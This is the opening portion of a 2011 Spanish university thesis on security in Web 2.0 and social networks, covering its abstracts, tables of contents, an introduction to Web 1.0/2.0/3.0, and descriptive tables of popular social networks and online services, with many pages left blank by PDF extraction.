PFC Maria Angeles Caballero Velasco PDF
PFC Maria Angeles Caballero Velasco PDF
PFC Maria Angeles Caballero Velasco PDF
Colmenarejo, julio de
2011
Aspectos de seguridad en Web
2.0 y redes sociales
Departamento de Informática
AUTOR:
MARÍA ÁNGELES CABALLERO VELASCO
Aspectos de seguridad en Web 2.0 y redes sociales 2011
ii
Aspectos de seguridad en Web 2.0 y redes sociales 2011
EL TRIBUNAL
Presidente:
Vocal:
Secretario:
Realizado el acto de defensa y lectura del Proyecto Fin de Carrera el día 18 de Julio
de 2011 en Colmenarejo, en la Escuela Politécnica Superior de la
Universidad Carlos III de Madrid, acuerda otorgarle la CALIFICACIÓN de
VOCAL
SECRETARIO PRESIDENTE
iii
Aspectos de seguridad en Web 2.0 y redes sociales 2011
Agradecimientos
Agradecer a Daniel González Gamonal por realizar la primera parte del proyecto
conjuntamente y así tomar una primera visión de la materia.
Agradezco también el apoyo por parte de los profesores de dichas carreras, así
como la gente de PA de la Universidad Carlos III que me apoyó en la realización del
proyecto y de la carrera en general.
iv
Aspectos de seguridad en Web 2.0 y redes sociales 2011
v
Aspectos de seguridad en Web 2.0 y redes sociales 2011
Resumen
Este proyecto final de carrera de universidad va enfocado a la seguridad en la Web 2.0 y las redes
sociales.
El documento se divide en dos partes. La primera parte define la visión principal del mundo 2.0, cómo
nació y que implicaciones tiene hoy en día en la sociedad. Se definen las características de la Web 2.0 y
su historia. Se analizan las diferencias entre la Web 2.0 y la Web 1.0, llegando hasta la Web 3.0. Se
clasifican los tipos de Web 2.0 por uso y por aplicación y se analizan todas las redes sociales que tienen
impacto hoy en día en el mundo. Finalmente se da una breve introducción a los lenguajes y
tecnologías, entornos dónde se usan y aspectos de la seguridad que en la segunda parte se entrará
más en profundidad en ellos.
La segunda parte del proyecto se desarrolla más en profundidad la seguridad relacionada con la Web
2.0. Se explica el concepto de Web 2.0 desde el lado del servidor (hardware y software del servidor),
desde el lado del cliente (hardware y software del cliente) y cómo se establece la comunicación entre
estos y qué tecnologías y lenguajes se utilizan para comunicarse (lenguajes y tecnología de
comunicación entre cliente y servidor). En cada una de estas tres partes se hace un desarrollo de las
amenazas de la seguridad que se ven implícitas, de los posibles ataques y la posibilidad de tomar
medidas de prevención, detección y corrección frente a estos ataques. Básicamente estos tres puntos
forman el grueso de esta segunda parte.
Una vez hecho el análisis del funcionamiento a nivel técnico de la Web 2.0 y su seguridad, se estudia la
privacidad en las redes sociales pasando desde los posibles fraudes que nos podemos encontrar a nivel
de ingeniería social, desde sistemas de autenticación y posibles medidas de seguridad que pueden
tomar los usuarios y los proveedores de estas redes sociales. También se desarrolla la legislación,
estándares y normativas que están relacionados con las redes sociales principalmente en España y
Europa.
Se realizan dos casos de uso estudiando las redes sociales de Facebook y Twitter y aplicando todos los
conocimientos adquiridos durante el estudio de toda la Web 2.0 y redes sociales. Se explica cómo
nacieron estas redes sociales, qué implicaciones tienen para la sociedad hoy en día, examinando su
seguridad y privacidad, tecnologías que usan, críticas realizadas a éstas y se examinan las noticias más
interesantes vistas en la prensa de éstas.
La última parte del proyecto incluye dos anexos de gran interés “Your Apps Are Watching You” y
“Banca 2.0, e-Banking” y finalmente se incluye un capitulo extra con presupuesto total del proyecto.
Palabras clave: Web 2.0, redes sociales, privacidad, seguridad, vulnerabilidades, amenazas, ataques
tecnologías, lenguajes, cliente, servidor, legislación, teléfonos inteligentes, Facebook, Twitter.
vi
Aspectos de seguridad en Web 2.0 y redes sociales 2011
vii
Aspectos de seguridad en Web 2.0 y redes sociales 2011
Abstract
This final university thesis is focused on security in Web 2.0 and social networking.
The document is divided in two diferent parts. The first part defines the main vision of the world 2.0,
how it was created and what are the present implications on society. The characteristics of Web 2.0
and its history are also included. We analyze the differences between Web 2.0 and Web 1.0,
concluding with Web 3.0. Web 2.0 is classified by types; use and application, and all the current social
networks with an impact are discussed. Finally, a brief introduction to the languages and technologies
is given, along with the environments where they are used and aspects of security. In the second part
of the thesis these matters are explained in detail.
The second part is focused on security related to the Web 2.0. The technical concept of Web 2.0 is
analyzed, from the server side (server hardware and software), from the client side (client hardware
and software), how communication between the two can be established and what are the technologies
and languages involved (languages and communication technologies between client and server). In
each of these three parts the implicit security threats are explained, as well as possible attacks and the
possibility of taking measures for prevention, detection and correction against these attacks. These
three points form the bulk of the second part.
Once the analysis of the technical concepts and security issues of the Web 2.0 is done, we study the
privacy in social networks, such as possible frauds on a social engineering level, authentication systems
and security measures that the users and social networks providers can take. The legislation,
standards and regulations that are related to social networks mainly in Spain and Europe are also
explained.
There are two use cases analyzing the Facebook and Twitter social networks and applying all the
knowledge acquired during the previous study of the whole Web 2.0 and social networking. We explain
how these social networks were created, what the implications for society nowadays are and examine
their security and privacy, technologies they use, criticisms they have been object to, and finally discuss
the most interesting pieces of news on them in the press.
The last part of the thesis includes two annexes of interest "Your Apps Are Watching You" and
"Banking 2.0, e-Banking" and an extra chapter with the total budget of the project.
Keywords: Web 2.0, social networks, privacy, security, vulnerabilities, threats, attacks, technologies,
languages, client, server, legislation, smartphones, Facebook, Twitter.
viii
Índice general
Contenido
Primera parte Aspectos de seguridad en Web 2.0 y redes sociales .....................................20
Capítulo 1 Introducción y objetivos ...................................................................................... 21
1.1. Introducción ..................................................................................................................... 21
1.2. Objetivos ......................................................................................................................... 21
1.3. Fases de desarrollo ...........................................................................................................22
1.4. Medios empleados ...........................................................................................................22
1.5. Estructura de la memoria ................................................................................................. 23
Capítulo 2 Introducción a la Web 2.0 .................................................................................... 25
2.1. Una Primera Visión .......................................................................................................... 25
2.2. Web 1.0, la Web de los datos ........................................................................................... 25
2.3. Web 2.0, la web de las personas .......................................................................................26
2.3.1. Características de las Web 2.0 ...................................................................................26
2.3.2. Un poco de historia Web 2.0......................................................................................28
2.3.3. Nueva visión. ¿Qué provocan las Web 2.0? ................................................................28
2.3.4. Wikipedia, la Web 2.0 por excelencia ........................................................................29
2.4. Comparación: Web 1.0 y Web 2.0 .................................................................................... 30
2.5. Web 3.0, Web semántica.................................................................................................. 31
Capítulo 3 Clasificación de la Web 2.0................................................................................... 32
3.1. Clasificación ..................................................................................................................... 32
3.1.1. Clasificación por uso .................................................................................................. 32
3.1.2. Por tipo de aplicación ................................................................................................ 32
Capítulo 4 Redes Sociales: Clasificación y ejemplos clave ................................................... 34
4.1. Clasificación ..................................................................................................................... 34
4.1.1. Sociales ..................................................................................................................... 35
4.1.2. Comunicaciones&Mensajería .................................................................................... 38
4.1.3. Infraestructura&Almacenamiento ............................................................................. 41
4.1.4. Fotografía&Video .....................................................................................................44
4.1.5. e-Commerce .............................................................................................................48
4.1.6. Profesionales&Productividad .................................................................................... 51
4.1.7. Música&Sonido ......................................................................................................... 54
Aspectos de seguridad en Web 2.0 y redes sociales 2011
x
Aspectos de seguridad en Web 2.0 y redes sociales 2011
xi
Aspectos de seguridad en Web 2.0 y redes sociales 2011
xii
Aspectos de seguridad en Web 2.0 y redes sociales 2011
xiii
Aspectos de seguridad en Web 2.0 y redes sociales 2011
xiv
Aspectos de seguridad en Web 2.0 y redes sociales 2011
xv
Índice de figuras
Ilustración 1. Web 2.0 Conference. .........................................................................................28
Ilustración 2. Portal de Wikipedia. ..........................................................................................29
Ilustración 3. Portal de Facebook. ........................................................................................... 63
Ilustración 4. Numero de visitas a las webs Facebook y MySpace durante el año 2008 por
meses. ....................................................................................................................................64
Ilustración 5. Portal de MySpace............................................................................................. 65
Ilustración 6. Portal de YouTube............................................................................................. 67
Ilustración 7. Portal de Tuenti. ................................................................................................68
Ilustración 8. Portal de Flickr. .................................................................................................69
Ilustración 9. Portal de Ebay. .................................................................................................. 70
Ilustración 10. Portal de Delicious. .......................................................................................... 71
Ilustración 11. Portal de Amazon. ........................................................................................... 72
Ilustración 12. Portal de Twitter. ............................................................................................. 73
Ilustración 13. Portal de Google. ............................................................................................. 74
Ilustración 14. Blogs................................................................................................................ 75
Ilustración 15. Ilustración 17. Servidor iDataPlex de IBM. ........................................................ 78
Ilustración 16. Seguridad 2.0. .................................................................................................94
Ilustración 17. CMS Used by Technorati Top 100. ................................................................. 101
Ilustración 18. Arquitectura de un servidor web. ................................................................... 115
Ilustración 19. Tabla de ARP. ................................................................................................ 121
Ilustración 20. Archivo hosts. ................................................................................................ 122
Ilustración 21. Ataque Smurf. ............................................................................................... 127
Ilustración 22. Establecimiento de sesión TCP. ..................................................................... 128
Ilustración 23. Ordenador portátil y ordenador de sobremesa. ............................................. 137
Ilustración 24. Ipad. .............................................................................................................. 137
Ilustración 25. Chrome OS Tablet. ........................................................................................ 138
Ilustración 26. WePad. .......................................................................................................... 138
Ilustración 27. Ilustración 29. IFree Tablet. ............................................................................ 139
Ilustración 28. Ultra Mobile PC.. ........................................................................................... 139
Ilustración 29. IPhone 3GS. ................................................................................................... 141
Ilustración 30. BlackBerry. .................................................................................................... 141
Ilustración 31. Nexus ONE. ................................................................................................... 142
Ilustración 32. Palm Pixi. ....................................................................................................... 142
Ilustración 33. PDA desarrollada por ACER. .......................................................................... 143
Ilustración 34. Sony PSP. ...................................................................................................... 144
Ilustración 35. Uso de los sistemas operativos de smartphones (Jun 09 – Jun 11). Fuente:
http://gs.statcounter.com/. .................................................................................................. 146
Ilustración 36. Uso de los sistemas operativos a nivel global (Jun 09 – Jun 11). Fuente:
http://gs.statcounter.com/. .................................................................................................. 147
Ilustración 37. Symbian OS. .................................................................................................. 148
Ilustración 38. BlackBerry OS................................................................................................ 148
Aspectos de seguridad en Web 2.0 y redes sociales 2011
xviii
Índice de tablas
Tabla 1. Artículo “What is Web 2.0” de Tim O’Reilly. .............................................................. 30
Tabla 2. Redes Sociales. Categoría: Social. ............................................................................. 35
Tabla 3. Redes Sociales. Categoría: Comunicaciones&Mensajería. ......................................... 38
Tabla 4. Redes Sociales. Categoría: Infraestructura&Almacenamiento. ................................. 41
Tabla 5. Redes Sociales. Categoría: Fotografía&Video. ..........................................................44
Tabla 6. Redes Sociales. Categoría: e-Commerce. ..................................................................48
Tabla 7. Redes Sociales. Categoría: Profesionales&Productividad. ......................................... 51
Tabla 8. Redes Sociales. Categoría: Música&Sonido............................................................... 54
Tabla 9. Redes Sociales. Categoría: Comunidad. .................................................................... 58
Tabla 10. Redes Sociales. Categoría: Búsquedas&Referencias................................................60
Tabla 11. Redes Sociales. Categoría: Otras. ............................................................................62
Tabla 12. Fenómeno blog por Le Meur. .................................................................................. 76
Tabla 13. Plataformas de gestión de contenidos, CMS.......................................................... 105
Tabla 14. Desglose de tareas del PFC.................................................................................... 364
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Primera parte
Aspectos de seguridad en Web 2.0
y redes sociales
Página 20
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 1
Introducción y objetivos
1.1. Introducción
1.2. Objetivos
El objetivo fundamental de la tesis es analizar la seguridad que existen en las redes sociales y
Web 2.0 desde el lado del cliente, servidor e interconexión entre ellos.
Página 21
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Una vez finalizada esta primera parte se empieza a desarrollar la segunda con un estudio en
profundidad de las redes sociales y la Web 2.0 desde el lado del cliente, del servidor y
lenguajes y tecnologías implícitos en todo el proceso. Se analizan también las normativas,
leyes y estándares relacionados con el mundo 2.0 y la privacidad en las redes sociales.
Una vez finalizado el desarrollo del proyecto se encuentra interesante analizar en casos de
redes sociales reales todo el proceso, por lo que escogió Facebook y Twitter para ello.
El principal medio utilizado a sido Internet ya que la información referente a la seguridad 2.0
se encuentra toda en Internet pero el problema es que está mal organizada y mal desarrollada
por lo que en un principio es complicado analizarla. También se ha contado con la posibilidad
de adquirir nuevos libros en la biblioteca de la universidad referentes a la seguridad en Web
2.0 y con los ordenadores de las aulas informáticas y salas de estudio de la Universidad Carlos
III para desarrollar el proyecto.
Página 22
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 23
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 24
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 2
Introducción a la Web 2.0
2.1. Una Primera Visión
Hoy en día en nuestro país escuchamos hablar constantemente de portales como Facebook,
Tuenti, Youtube o Wikipedia. Todos estos portales forman parte del meme1 de moda en
Internet, es decir, de la Web 2.0 que está englobada en un entorno de colaboración formando
un entramado de redes sociales infinitamente grande. Con la Web 2.0 ha nacido una visión
nueva de ver la web y con ella nuevas tecnologías para su desarrollo, nuevos entornos y
aplicaciones, nuevos sistemas de marketing y políticas de publicidad y con todo esto, una
renacer de las empresas de T.I. Básicamente con la Web 2.0 ha nacido una nueva filosofía de
vida.
La Web 2.0 y las redes sociales se basan en la creación de contenidos que producen y
comparten los propios usuarios de un mismo portal. Estos usuarios se convierten en
productores de la información que ellos mismos consumen. Se ha convertido en algo social
capaz de dar soporte a todos los usuarios y formar parte de una verdadera sociedad de la
información.
La Web 1.0 es completamente estática, de solo lectura, el usuario no puede interactuar con el
contenido de la página, no se pueden hacer comentarios, ni respuestas, ni citas, estando
totalmente limitado a lo que el webmaster actualiza en la página web. Es un sistema de
documentos de hipertexto hipervinculados que funciona a través de internet mediante cliente-
servidor.
1
Meme es un neologismo que se refiere a la unidad teórica de información de transferencia cultural de una mente a otra más
pequeña que existe. Término acuñado por Richard Dawkins en “El gen egoísta”, señalando la similitud tan gran que existe entre la
memoria y la mímesis.
Página 25
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Web 2.0 se basa en la idea de añadir metadatos semánticos y ontológicos2 a la web. Esas
informaciones adicionales (que describen el contenido, el significado y la relación de los datos)
se deben proporcionar de manera formal, para que así sea posible evaluarlas
automáticamente por máquinas de procesamiento. El objetivo es mejorar la calidad de
Internet, ampliando la interoperabilidad entre los sistemas informáticos y reducir la necesaria
mediación de operadores humanos.
El problema del lenguaje HTML es que no permite relacionar datos para describir elementos,
la web semántica se ocuparía de resolver estas deficiencias. Para ello dispone de tecnologías
de descripción de los contenidos, como RDF (Resource Description Framework) y OWL (Web
Ontology Language), además de XML (eXtensible Markup Language), el lenguaje de marcas
diseñado para describir los datos. Hablamos de la Web 3.0.
El éxito de los portales como Google se debe a La Larga Cola3 (del inglés The Long Tail), que se
basa en que el usuario haga uso de la web a su gusto y gestione los datos a su manera, de tal
manera que se puede llegar a toda la web, a la “cola” de la web y no solo a la “cabeza” de ésta.
El principal éxito de la Web 2.0 se basa en el ambiente de colaboración por parte de toda la
comunidad de usuarios de manera que la información surge de una manera increíblemente
fluida, veraz y completamente actualizada al minuto.
2
El término ontología en informático hace referencia a la formulación de un exhaustivo y riguroso esquema conceptual dentro de
uno o varios dominios de datos. El fin es facilitar la comunicación y el intercambio de información entre diferentes sistemas y
entidades. (Wikipedia, http://es.wikipedia.org/wiki/Ontolog%C3%ADa_(inform%C3%A1tica).
3 The Long Tail , término acuñado por Chris Anderson en un artículo para la revista Wired, octubre de 2004
Página 26
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La Web 2.0 reúne las capacidades de software de cliente y servidor, sindicación de contenidos
y uso de protocolos de red. Estándares orientados a los navegadores web que pueden usar
plug-ins y extensiones de software para manejar el contenido y las interacciones del usuario.
Los portales 2.0 ofrecen almacenamiento de información a los usuarios, creación y difusión de
capacidades que no eran posibles en el entorno Web 1.0.
Página 27
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4
Profesor Sáez Vascas, 2004
Página 28
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
A pesar de estas críticas, Wikipedia es la web más visitada junto a Google y Youtube, es decir,
que tiene una gran aceptación a nivel mundial. La gran ventaja de este portal, es que
mantiene la información actualizada gracias a la rapidez con la que son modificados los
artículos por los usuarios, de ahí su nombre “wiki” (rápido en hawaiano) y “pedia” (de
enciclopedia).
5
Para más información sobre las críticas de Wikipedia, se puede consultar el reportaje “¿Debemos fiarnos de Wikipedia?” del
diario El País y de la autora Carmen Pérez-Lanzac.
http://www.elpais.com/articulo/sociedad/Debemos/fiarnos/Wikipedia/elpepusoc/20090610elpepisoc_1/Tes.
Página 29
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
6
Interpretación de la Web 2.0 realizada en una sesión de brainstorming entre O’Really y Media Live Internacional. Para más
detalles consultar el artículo What is Web 2.0 http://oreilly.com/web2/archive/what-is-web-20.html.
Página 30
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La Web 3.0 se asocia a una nueva etapa como evolución de la Web 2.0. Todavía se debate el
significado de Web 3.0 y su definición. La Web 3.0 se trata de la evolución de la red en una
base de datos, movimiento hacia los contenidos accesibles por aplicaciones non-browser,
empuje de las tecnologías de la inteligencia artificial, web semántica, web Geoespacial, web
3D, etc.
La evolución a la Web 3.0 llevara consigo un nacimiento de nuevas tecnologías haciendo uso
de datos semánticos. “Data Web” es un paso a la nueva era web, permite mayor integración
de la información haciendo ésta más accesible y enlazable con otras webs. Esta evolución se
debe a que actualmente existen muchos formatos dispares para la creación de portales web
como HTML, XML, JavaScript, RDF, microformatos, etc. “Data Web” es el primer paso hacia la
Web 3.0 y hacia la “Web Semántica”. La evolución hacia la Web 3.0 también va enfocada hacia
el 3D, transformando los portales que existen hoy día en dos dimensiones en portales 3D
abriendo nuevas fronteras de colaboración y conexión de portales.
Página 31
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 3
Clasificación de la Web 2.0
3.1. Clasificación
Podríamos clasificar las Web 2.0 de muchas maneras, pero se han escogido dos tipos de
clasificaciones fundamentales que son por uso y por aplicación.
Por uso, referidas al entorno en el que actúan, ya sea social, profesional o cultural, y pos
aplicación, referido a las aplicaciones que dan apoyo o son esenciales para la Web 2.0.
Entretenimiento.
o Chessstweets – aplicación para jugar al ajedrez a través de Twitter.
Imagen.
o Flickrorama – visualiza Flickr en 3D.
Video.
o Tu.tv – canal de streaming de videos.
Música (audio, potcast).
o venueM – optimizar el potcast para iPhone/iPod touch.
Literatura y Arte.
o Librofilia – se trata de una red social dedicada a recomendaciones literarias.
Cine, televisión y radio.
o Nanocrowd – sistema de recomendación de películas.
Ayuda (tutoriales, guías, manuales).
o Guiate – manuales y tutoriales indicados por los usuarios.
7
Ejemplos de aplicaciones obtenidas de la web http://wwwhatsnew.com/recopilacion.
Página 32
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Buscadores.
o RapidShare123 – busca archivos de RapidShare.
Comercio electrónico (venta de artículos, compra-venta).
o Tweexchange – mercado de compra-venta de usuarios de Twitter.
Diccionarios, enciclopedias y traductores.
o SpeakLike – traductor en tiempo real de conversación vía chat.
Correo electrónico.
o Spicebirg – cliente de correo que está basado Thunderbird.
Gestión de proyectos (office, procesamiento de archivos).
o Xmind – aplicación de brainstorming y gestión de proyectos.
Redes sociales.
o Tigga.me – aplicación para agrupar redes sociales.
Informática (seguridad, sistemas operativos, programación).
o MLab – herramientas de Google para evitar el filtrado P2P.
Otras categorías
o Viajes (hospedaje, vuelos).
o Inmobiliarias.
o Chats (citas, comunicación, mensajería instantánea).
o Descargas (torrent, P2P, descarga directa).
o Gestión académica (profesionales, universidades, escuelas).
o Motor (coches, motos, automóviles).
o Deportes.
o Móviles.
o Movimientos sociales (mejora del mundo, ongs).
o Política.
o Religión.
o Cocina (alimentación, salud).
o Código abierto.
o Noticias.
Página 33
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 4
Redes Sociales: Clasificación y
ejemplos clave
La mejor manera de comprender lo que son los portales2.0 es conociendo las webs que hoy
día están a la cabeza de este fenómeno Web 2.0. La gran aceptación que han tenido éstas
webs, se debe en parte a la versatilidad que da Web 2.0 para crear y consumir información, y
principalmente que todas ellas son gratuitas, teniendo así fácil y rápido acceso a la
información de éstas. Más que la tecnología, destaca el esfuerzo que realizan estos portales
en dar facilidades y herramientas a los usuarios y la interacción de que los usuarios pueden
realizar con el portal que es muy dinámica.
Por otro lado este tipo de websites tienen un gran hándicap y es que en la mayoría de ellas, con
sólo tener una dirección de email y sin tener que facilitar más datos personales, es posible
crear un perfil en la mayoría de redes sociales. Esto puede llevar a problemas de seguridad
básicos, como suplantación de la identidad de la persona que se comentarán más adelante.
Veamos cuáles son las Web 2.0 que tenemos en Internet y posteriormente desarrollaremos las
más populares.
4.1. Clasificación
Las redes sociales las vamos a clasificar según su contenido:
Sociales.
Comunidades y mensajería instantánea.
Infraestructura y almacenamiento de datos.
Fotografía y video.
Comercio electrónico.
Profesionales y de productividad.
Música y sonido.
Comunidad.
Búsqueda y referencia.
Otras
Página 34
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.1. Sociales
Redes sociales de tipo social.
Red Descripción
Facebook
Facebook.com
Facebook es una red social creada por Mark Zuckerberg,
que pone en contacto a personas y amigos. Los usuarios
pueden participar en varias redes.
Twitter
Twitter.com
Tuenti
Tuenti.com
Tuenti, es una red social habitual orientada para el público
español joven. Dentro del perfil de usuario se pueden tener
fotos, videos y contactar con amigos.
MySpace
MySpace.com
MySpace es una red social orientada a grupos de música y
artistas principalmente con la posibilidad de crear perfiles
de usuario.
Hi5
Hi5.com
Hi5, es una red social global destinada a jóvenes. La
mayoría de usuario de esta red se encuentra en América
Latina.
Página 35
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Orkut
Orkut.com Orkut es una red social promovida por Google desde enero
del 2004. La red está diseñada para permitir a sus
integrantes mantener sus relaciones existentes y hacer
nuevos amigos, contactos comerciales o relaciones más
íntimas.
Friendster
Friendster.com/
Friendster es un una red social que crea grupos sociales
similares a los de la vida real en una gran red virtual.
Bebo
Bebo.com Bebo es una red social que recibe recomendaciones sobre
música, vídeos, artículos y juegos. Se pueden compartir
fotos, enlaces, vídeos, aficiones e historias. Conecta con
amigos, familiares, compañeros de clase o de trabajo y
nuevas amistades.
Google Groups
Groups.google.com
Google Groups, es un servicio de Google que permite crear
listas de correo para mantener comunidades o facilitar la
comunicación entre personas. Permite el acceso a la red de
grupos Usenet.
Yahoo! Groups
Groups.yahoo.com
Yahoo! Groups, es una herramienta social para crear grupos
por Internet, pudiendo crear una comunidad virtual o ver
directorios de grupos hechos por otros usuarios.
Página 36
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Del.icio.us
Delicious.com
Delicious, es un servicio web de gestión de marcadores
permitiendo guardar online los marcadores clásicos que se
guardaban en los favoritos de los navegadores y
categorizándolos por un sistema de tags o folcsonomías.
LiveJournal
LiveJournal.com
LiveJournal se trata de un weblog que permite a los
usuarios mantener un diario online. La diferencia entre
otros sitios de blog es que incluye características de redes
sociales como por ejemplo la “Página de Amigos”.
Meebo
Meebo.com
Meebo, es la plataforma web de IM para cualquier red.
Podemos conectar nuestro MSN, Yahoo, AOL/AIM,
MySpace, Facebook, Gtalk y muchas redes más todas
juntas.
Netvibes
Netvibes.com
Netvibes es un servicio web que hace las veces de escritorio
virtual personalizado mediante gadgets. Se organiza en
pestañas por temas; cada pestaña es un agregador de
widgets o módulos desplazables que los define el usuario.
iGoogle
iGoogle.com
iGoogle ofrece un servicio similar a Netvibes. Se trata de
una página personalizada donde se puede añadir mediante
gadgets noticias, fotos, predicciones de tiempo o cualquier
otro tema.
Ning
Ning.com
Página 37
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.2. Comunicaciones&Mensajería
Aplicaciones y webs de comunicaciones y mensajería 2.0.
Red Descripción
Gtalk
Google.com/talk
AIM
Aim.com/
Skype
Skype.com
Página 38
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Yahoo! Messenger
Messenger.yahoo.com
Trillian
Trillian.im
iChat
Apple.com/es/support/ichat
ooVoo
ooVoo.com
Página 39
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Pidgin
Pidgin.im
Página 40
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.3. Infraestructura&Almacenamiento
Aplicaciones de infraestructura de almacenamiento.
Red Descripción
DropBox
DropBox.com
YouSendIt
YouSendIt.com
YouSendIt es una de las aplicaciones más populares y
seguras para compartir archivos online que permite
fácilmente mandar archivos de gran extensión y adjuntos al
correo. Permite hasta 1Gb de archivos de hasta 100Mb de
almacenamiento.
BitTorrent
BitTorrent.com BitTorrent es una aplicación desarrollada por BitTorrent.Inc
que permite el envío de archivos vía P2P para poder
descargar ficheros de otros usuarios o partes de estos
mediante archivos .torrent.
Página 41
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
OpenID
OpenID.com
OpenID es un sistema de autenticación global, seguro, libre
y sencillo que facilita la identificación en muchas páginas
webs ya que usa el mismo identificador para todas
mediante una url de OpenID teniendo así un solo ID para
todos los accesos.
Mozy
Mozy.com
Mozy se trata de una herramienta de backup online de hasta
2Gb de almacenamiento.
Carbonite
Carbonite.com
Carbonite Online Backup es una herramienta de backup
online para MAC.
Adobe AIR
Adobe.com/products/air
Adobe AIR, se trata de un entorno de ejecución
multiplataforma para la construcción de aplicaciones RIA
(Rich Internet Applications). Utiliza tecnologías de Adobe
Flash, Adobe Flex, HTML y AJAX.
Box
Box.net
Página 42
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
LogMeIn
LogMeIn.com LogMeIn es un servicio para acceder de forma remota a los
equipos de Windows o MAC pudiendo acceder también
desde un dispositivo móvil. Existe la posibilidad de crear
una red virtual P2P con otros equipos y de creación de
backups.
OpenDNS
OpenDNS.com
OpenDNS es un servidor de DNS (Domain Name System)
gratuito y abierto. Da la posibilidad de hacer resolución
DNS a usuarios como alternativa al servidor DNS de su ISP
(Internet Service Provider).
Pando
Pando.com Pando es un cliente P2P que permite intercambiar archivos
de cualquier tipo de manera gratuita. Tiene ciertas
limitaciones como que el tamaño del archivo solo puede ser
de menos de 1Gb y límite de tiempo de descarga si no se
realizan descargas con frecuencia.
Sharefile
Sharefile.com
Sharefile provee almacenamiento online para empresas.
Tiene servicios de encriptación de archivos, subida de
archivos por FTP, etc.
Página 43
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.4. Fotografía&Video
Webs 2.0 dedicadas a la fotografía y/o al video.
Red Descripción
Flickr
Flickr.com Flickr es un portal web que permite subir fotografías y
vídeos y compartirlas online. La popularidad de Flickr reside
en la posibilidad de administrar las fotografías mediante
tags, el comentar y explorar otras fotos y la posibilidad de
hacer una red de amigos y perfiles favoritos.
FotoFlexer
FotoFlexer.com FotoFlexer es un editor online con multitud de herramientas
incluyendo efectos que permite editar fotos que subamos
directamente a la web o editar fotos de de photobucket,
myspace, facebook, flickr, picasa u otras webs.
Photobucket
Photobucket.com Photobucket se trata de un sitio web que permite subir
imágenes, videos y crear slideshows y álbumes de
presentaciones. Se pueden realizar comentarios en las fotos
de otros igual que con flickr.
Fotolog
Fotolog.com
Fotolog es como un blog fotográfico. La idea es publicar
una foto al día con algún pequeño comentario donde
nuestras amistades pueden hacer comentarios también.
Webshots
Webshots.com Webshots es un portal para compartir fotografías creado
por American Greetings que permite subir fotos y videos
personales en álbumes de diferentes áreas. También
permite descargar fondos de pantalla gratuitos.
Página 44
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Youtube
YouTube.com
Amazon Video On
Demand
Amazon Video On Demand (VoD) se trata de un servicio 2.0
Amazon.com
de video on demand. El VoD es un sistema de televisión que
permite al usuario acceder a contenidos multimedia de
forma personalizada. Solo está permitido en Estados
Unidos y usa tecnología Flash Video en todos los
navegadores con el plugin de Adobe Flash instalado.
Antiguamente este servicio se conocía como Amazon
Unbox.
FixMyMovie
FixMyMovie se trata de un sitio online que permite subir
FixMyMovie.com
grabaciones realizadas con cámaras de video, teléfonos o
webcams y retocarlos quitando errores de pixelado. Es un
servicio originalmente militar y permite aumentar la
resolución de los videos usando un algoritmo de H.264 en
formato HD y guardarlos en los formatos .mp4, .3g2, .avi,
etc. También permite la posibilidad de incrustar los videos
en los blogs, compartirlos, etc.
Página 45
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Joost
Joost.com
Joost se trata de un programa y una aplicación web, para
distribuir programas de televisión u otros videos que incluye
tecnología P2P para ello. Esta autorizado para distribuir
videos de distintos medios como MTC o VH1 dejando de
lado a Youtube. Actualmente está en su fase beta.
Miro
getMiro.com
Miro es una aplicación de televisión online gratuita que
ofrece canales de muchas fuentes y permite HD. Permite
ver videos, audio y podcasts. Está desarrollado para
Windows, MAC, Ubuntu, OSX y otras distribuciones.
Netflix
Netflix.com
Netflix es un servicio de pago que permite ver televisión
online, películas y series en streaming. Está desarrollado
para MAC y para Windows.
uStream
www.uStream.tv
uStream es un sitio web americano de pago que consiste en
una red de diversos canales que provee una plataforma de
lifecasting y video streaming de eventos online.
Veodia
Veodia.com
Veodia es un servicio online que permite grabar, descargar
y compartir en alta calidad videos de manera rápida y fácil.
Permite agregar videopodcasts de alta calidad a nuestro
blog.
VoiceThread
VoiceThread.com VoiceThread es una aplicación que permite recopilar y
compartir un grupo de conversaciones sin necesidad de
instalar ningún software. La aplicación es colaborativa
porque permite crear slides shows, compartir imágenes,
documentos, videos y permite a la gente dejar comentarios.
Página 46
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
TUtv
Tu.tv
daleAlPlay
Dalealplay.com/
daleAlPlay se trata de una web española de TV 2.0 que
permite crear nuestro propio canal para compartir videos.
Podemos descargar, subir o compartir videos a modo de
Youtube.
Página 47
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4.1.5. e-Commerce
Portales dedicados al comercio electrónico.
Red Descripción
Amazon
Amazon.com
Amazon es una web 2.0 de comercio electrónico. Fue una
de las pioneras en la venta de comercio por Internet.
Permite la compraventa de todo tipo de artículos. En
Europa solo funciona en Alemania, Francia y Gran Bretaña
de momento.
eBay
eBay.com
eBay es un portal de internet destinado a la subasta de
artículos por Internet. Permite tres operaciones: subasta,
